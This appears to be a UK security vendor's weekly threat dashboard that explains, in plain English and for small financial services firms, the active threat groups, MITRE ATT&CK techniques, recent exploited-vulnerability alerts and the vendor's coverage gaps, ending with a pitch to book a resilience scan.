MITRE-Lite | SME Threat Intelligence Dashboard

Threat Landscape

Active Threat Actors Targeting UK Financial Services

Active Threat Actor Groups

Confirmed targeting UK fin. services SMEs

Techniques in Active Use

From SME-relevant ATT&CK subset

New Techniques This Week

Browser exploit via crafted HTML — Chrome, Edge, Opera affected

CISA KEV Entries

SME-relevant new entries — includes ransomware-flagged Oracle PeopleSoft

What is MITRE ATT&CK? It's a publicly-maintained library of every known attack technique used by criminal groups and state-sponsored hackers — think of it as a documented playbook of everything attackers try. This dashboard filters it down to the techniques that realistically threaten businesses like yours: small financial services firms, insurance brokers, and professional services companies in the UK.

Actor / Group	Origin	Primary Method	Active Techniques (ATT&CK IDs)	SME Risk
Scattered Spider aka UNC3944, Octo Tempest	CYBERCRIME	SIM-swapping and social engineering to bypass MFA; targets IT helpdesks to gain access.	T1078 T1566.001 T1621	HIGH
ALPHV / BlackCat Ransomware-as-a-Service group	CYBERCRIME	Ransomware deployment following stolen credentials and VPN exploitation. Known to target professional services firms.	T1486 T1190 T1657	HIGH
APT29 / Cozy Bear SVR, Russian Foreign Intelligence	RUSSIA / STATE	Spearphishing and supply chain compromise. Primarily targets government and finance. Sophisticated, long-dwell operations.	T1566.002 T1195 T1071.001	MEDIUM
APT40 / BRONZE MOHAWK Chinese MSS-linked group	CHINA / STATE	Exploitation of internet-facing services and VPNs. Actively targeting financial data and intellectual property.	T1190 T1133 T1041	MEDIUM
MuddyWater STATIC KITTEN, Iranian MOIS	IRAN / STATE	Phishing and exploitation of web frameworks (Laravel, Zimbra). Targeting professional services and finance for espionage.	T1566.001 T1190 T1059	MEDIUM
LockBit 3.0 Affiliates Ransomware-as-a-Service network	CYBERCRIME	Access brokers sell network entry to affiliates who then deploy LockBit ransomware. SMEs frequently targeted as easier entry points.	T1486 T1078 T1083	HIGH
TA4903 (BEC Specialists) Business Email Compromise group	CYBERCRIME	Impersonation of senior staff, solicitors, and payment processors to redirect bank transfers. Primary threat vector for insurance brokers.	T1566.002 T1534 T1078	HIGH

Coverage Metrics

How Much of This Does GET-IT Cover?

Techniques Covered

GET-IT stack addresses these directly

64%

Coverage Rate

Of the 14 active techniques this week — unchanged

Uncovered Techniques

Honest gap — not covered by current stack

Partial

Exfiltration Coverage

Monitoring detects data movement; cannot always block it

We show you the gaps honestly. No security provider covers everything. The 5 uncovered techniques below include areas where mitigations depend on human behaviour (staff training) or third-party dependencies (your cloud provider, your line-of-business software vendor). We flag them so you know what to ask about — and so you can factor them into cyber insurance conversations.

Coverage by Tactic

Initial Access

75% 3 of 4 techs

Execution

80% 4 of 5 techs

Persistence

67% 2 of 3 techs

Lateral Movement

50% 1 of 2 techs

Exfiltration

33% 1 of 3 techs

Impact

100% 3 of 3 techs

Exfiltration gap — what this means for your insurance: If an attacker reaches your data and moves it slowly out via legitimate cloud services (Microsoft OneDrive, SharePoint, or email), detection requires behavioural monitoring that goes beyond standard endpoint protection. Many cyber insurance policies include data exfiltration in their coverage — but only where you can demonstrate attempted prevention. Speak to us if this concerns you.

Active Techniques

Techniques in Use Against UK SMEs This Week

T1566.001 · T1566.002

Phishing — Email & Link-based

Attackers send fake emails pretending to be HMRC, your bank, a solicitor, or a trusted supplier. The email contains a malicious attachment or a link to a fake login page designed to steal your password.

T1190

Exploit Public-Facing Application

Attackers search for unpatched software on your internet-facing systems — VPNs, firewalls, web apps — and exploit known security holes to get in. This is the entry point for many ransomware campaigns. This week: Palo Alto PAN-OS VPN bypass (CVE-2026-0257) confirmed actively exploited.

T1078

Valid Accounts (Stolen Credentials)

An attacker who has obtained a username and password (from a previous breach, phishing, or the dark web) simply logs in using legitimate credentials. No hacking required — they look like a real user.

T1059

Command-Line Scripting (PowerShell / cmd)

Once inside, attackers use built-in Windows tools (PowerShell, command prompt) to run malicious commands without installing suspicious software. This makes them harder to detect because they're using your own tools against you.

T1621

MFA Fatigue Attack

An attacker who has your password sends dozens of multi-factor authentication (MFA) push notifications to your phone, hoping you'll accidentally approve one — or approve it just to make the alerts stop. This bypasses MFA entirely.

T1598.003

Messaging App Targeting (Spearphishing via Service)

Attackers harvest WhatsApp, Signal, and LinkedIn accounts of senior staff to build social engineering profiles — then impersonate trusted contacts to extract credentials or authorise fraudulent payments. NCSC issued a specific warning this week.

T1133

External Remote Services (VPN Abuse)

Attackers exploit or abuse your VPN, remote desktop (RDP), or remote access tools to maintain persistent access — often long after the initial breach is discovered. They effectively install a back door.

T1534

Internal Spearphishing

Having compromised one email account, attackers use it to send convincing phishing emails to other staff internally. A message appearing to come from your MD or finance director asking to approve an urgent payment.

T1041 · T1567

Data Exfiltration via Cloud Services

Attackers copy your files out through legitimate cloud services — SharePoint, OneDrive, Dropbox, Google Drive — because this traffic looks normal to most security tools. Data is gone before anyone notices.

T1486

Data Encryption for Ransom

The final step in most ransomware attacks — all your files are encrypted and you're locked out of your own systems. A ransom demand follows. UK SMEs paid an average of £47,000 per incident in 2025, with recovery taking 3–4 weeks.

T1657

Financial Theft (Business Email Compromise)

An attacker with access to a business email account monitors payment conversations and intercepts at the right moment — substituting their own bank account details. The #1 financial loss vector for UK insurance brokers and professional services firms.

Threat Severity

Current Risk Status for UK Financial Services SMEs

△

█ THREAT LEVEL: ELEVATED

Sustained High-Activity Period — Financial Services Sector

NCSC and industry sources indicate continued elevated threat activity targeting UK professional services and financial sector SMEs. BEC attacks on insurance brokers are up approximately 34% year-on-year. Ransomware affiliate groups continue to prioritise SME targets identified as having weaker controls than enterprise counterparts. No specific imminent threat to a named organisation — but the baseline risk for this sector remains above normal.

► Highest Severity Active Technique — Week 25 / 2026

Browser Code Execution (T1189) — Google Chromium V8 Out-of-Bounds Vulnerability

CISA added CVE-2026-11645 to its Known Exploited Vulnerabilities catalog on 9 June 2026 — an out-of-bounds read and write vulnerability in Google Chromium's V8 JavaScript engine that allows a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. Critically, this vulnerability affects every browser built on Chromium: Google Chrome, Microsoft Edge, and Opera. Any user visiting a malicious or compromised webpage — without clicking anything, without downloading anything — can have code executed on their machine. Patch status should be confirmed with IT providers as a priority this week. Also added: Oracle PeopleSoft Enterprise PeopleTools (CVE-2026-35273), carrying a confirmed ransomware exploitation flag — unauthenticated attackers can achieve full system takeover. Organisations running PeopleSoft for HR or ERP should treat this as critical. GCHQ Director Anne Keast-Butler confirmed this week at London Tech Week that the most prominent threats in cyberspace remain ransomware and criminal activity, with the NCSC handling approximately four nationally significant cyber incidents every week — a figure that underscores the sustained operational tempo attackers are maintaining against UK targets. A Buckinghamshire secondary school (Great Marlow) was forced to close mid-week following a ransomware-style malware incident, further illustrating the operational impact of attacks on organisations with limited IT resource — a profile shared by many SMEs.

🔒

█ Ransomware Activity Indicator

ACTIVE — LockBit 3.0 Affiliates and ALPHV/BlackCat Successors Operational

Both ransomware-as-a-service ecosystems remain active with affiliate networks continuing to acquire access from initial access brokers. UK professional services firms make up approximately 18% of confirmed UK ransomware victims in Q1 2026 (NCSC data). Offline backups, patching cadence, and tested recovery plans are the three most effective mitigations at this level.

Intelligence Feed

Live Source Summary

■ NCSC UK Alerts

No new NCSC advisories this week. GCHQ Director confirmed at London Tech Week that NCSC handles approximately four nationally significant cyber incidents per week — ransomware and criminal activity remain the most prominent threats facing UK organisations.

Latest advisory: 4 June 2026 → View NCSC →

■ CISA KEV Entries (SME-Relevant)

Four SME-relevant new entries: Google Chromium V8 browser exploit (Chrome, Edge, Opera); Oracle PeopleSoft with confirmed ransomware flag; Ivanti Sentry OS command injection; Cisco Catalyst SD-WAN command execution.

Latest: 12 June 2026 → View CISA KEV →

■ Top Sector Affected This Week

Finance & Insurance

FCA warns consumers about misleading car finance claims management adverts and secures confiscation order against Ponzi scheme fraudster. AI-fabricated evidence confirmed in UK criminal case — Derbyshire police officer under criminal investigation — raising direct concerns about fraudulent documentation in insurance claims.

FCA alert: 9 June 2026 → View →

Full Advisory Detail

For full advisory detail, vulnerability write-ups, and CISA KEV entries see the Threat Advisory page →

Has Your Email Been Breached?

Check whether your business email appears in known breach databases — Free check →

Does Your Security Stack Cover These Techniques?

64% coverage of active techniques is a starting point. If you'd like to understand exactly where your gaps are — and what it would cost to close them — book a resilience scan.

Book a Resilience Scan →

Intelligence sourced from NCSC UK, the CISA Known Exploited Vulnerabilities Catalog, FCA ScamSmart, and the MITRE ATT&CK framework (licensed under CC BY 4.0). Technique descriptions are plain-English interpretations for SME audiences and are not verbatim reproductions of MITRE documentation. Coverage assessments reflect the GET-IT stack as configured for a typical SME client — actual coverage depends on your specific environment. This dashboard is updated weekly; data may not reflect events in the 24–48 hours prior to the last refresh date. GET-IT Solutions Ltd is not responsible for inaccuracies in third-party source data.

MITRE-Lite Threat Dashboard